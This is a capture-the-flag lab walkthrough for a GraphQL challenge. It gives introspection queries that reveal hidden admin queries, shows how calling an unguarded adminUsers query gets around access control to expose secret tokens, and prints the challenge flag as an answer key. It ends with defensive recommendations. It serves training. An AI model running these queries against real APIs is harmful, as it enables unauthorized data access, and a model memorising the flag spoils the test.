Labs / GraphQL Gateway

Daily Challenge
Released 12 Sep 2025

🚀 Can you unlock the secrets hidden in their GraphQL schema?

This company's modern GraphQL API promises flexible data access and powerful querying capabilities for their internal systems. 🔍 But with great power comes great responsibility - and their developers might have left a few doors unlocked. 💡 Dive deep into schema introspection, discover hidden queries, and exploit authorization flaws to uncover sensitive information that should never see the light of day! 🕵️

Flags

Points

Daily Challenge

Solution Available

Pro Exclusive

Start Lab Environment

~1-2 min setup

AWS dedicated

Private instance

Industry standard

Daily Challenge

🚀 GraphQL Gateway - Complete Solution

Objective: Exploit GraphQL schema introspection and authorization bypass vulnerabilities to access sensitive administrative data and retrieve the hidden flag.

🔍 Step 1: Access the GraphQL Playground

Navigate to /graphql in your browser to access the interactive GraphiQL interface. This provides a user-friendly environment for exploring the GraphQL API and crafting queries.

🔍 Step 2: Basic Schema Introspection

Start with basic schema introspection to discover the publicly available queries:

query BasicIntrospection {
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}

This reveals only 4 public queries: users, user, projects, and project. No administrative functions are visible yet.

🔍 Step 3: Deep Type Introspection Discovery

The key breakthrough comes from using deep type introspection to examine the Query type directly:

query DeepIntrospection {
  __type(name: "Query") {
    fields {
      name
      description
      args {
        name
        type { name }
      }
    }
  }
}

This deeper introspection reveals 7 total queries including 3 hidden administrative functions:

Query	Type	Description
users	Public	Get users with optional role filter
user	Public	Get single user by ID or username
projects	Public	Get projects with optional status filter
project	Public	Get single project by ID
adminUsers	Hidden Admin	Administrative query to get all users
classifiedProjects	Hidden Admin	Administrative query to get classified projects
userSecrets	Hidden Admin	Administrative query to get user secrets

🔍 Step 3: Verify Regular User Access is Restricted

First, test the regular users query to confirm it properly filters administrative users:

query {
  users {
    id
    username
    role
    secret_token
  }
}

This returns only regular employees and contractors, properly excluding system administrators.

🔍 Step 4: Test Role-Based Filtering

Try to access admin users through the regular query with role filtering:

query {
  users(role: "admin") {
    id
    username
    role
    secret_token
  }
}

This correctly returns an empty array, confirming that the regular users query properly filters out administrative accounts.

🔍 Step 5: Authorization Bypass Exploitation

Now exploit the main vulnerability - the adminUsers query lacks proper authorization checks. Use this query to bypass all access controls:

query {
  adminUsers {
    id
    username
    role
    secret_token
  }
}

This unauthorized query returns all users in the system, including the system administrator account with role "system" that contains the flag in the secret_token field.

🔍 Step 6: Extract the Flag

From the adminUsers query results, locate the user with role "system" (typically the last user in the list). The flag is stored in their secret_token field:

Field	Value	Description
username	system_admin	System administrator account
role	system	Administrative role
secret_token	1d25cb65-383f-4a56-bfe0-778f912a43fd	🎯 This is the flag!

🎯 Final Answer

Flag: 1d25cb65-383f-4a56-bfe0-778f912a43fd

🔍 Alternative Discovery Methods

You could also discover the flag through other vulnerable queries exposed by introspection:

# Method 1: Direct admin query (primary method)
query { adminUsers { username role secret_token } }

# Method 2: User secrets query (if you know the admin user ID)
query { userSecrets(user_id: 5) }

# Method 3: Classified projects with nested user data
query { classifiedProjects { owner { secret_token } } }

📚 Key Vulnerabilities Exploited

Schema Introspection Enabled: Allows discovery of hidden administrative queries
Authorization Bypass: The adminUsers query lacks proper access control
Information Disclosure: Sensitive fields like secret_token are exposed without proper filtering
Excessive Data Exposure: Administrative queries return more data than necessary

🛡️ Security Recommendations

Disable Introspection: Turn off schema introspection in production environments
Implement Authorization: Add proper authorization checks to all resolver functions
Field-Level Security: Restrict access to sensitive fields based on user roles and permissions
Query Whitelisting: Only allow pre-approved queries in production
Rate Limiting: Implement query complexity analysis and rate limiting
Audit Logging: Log all GraphQL queries for security monitoring

Real-World Impact: This type of vulnerability is common in GraphQL APIs where developers focus on functionality over security. Always implement proper authorization at the resolver level and disable introspection in production environments.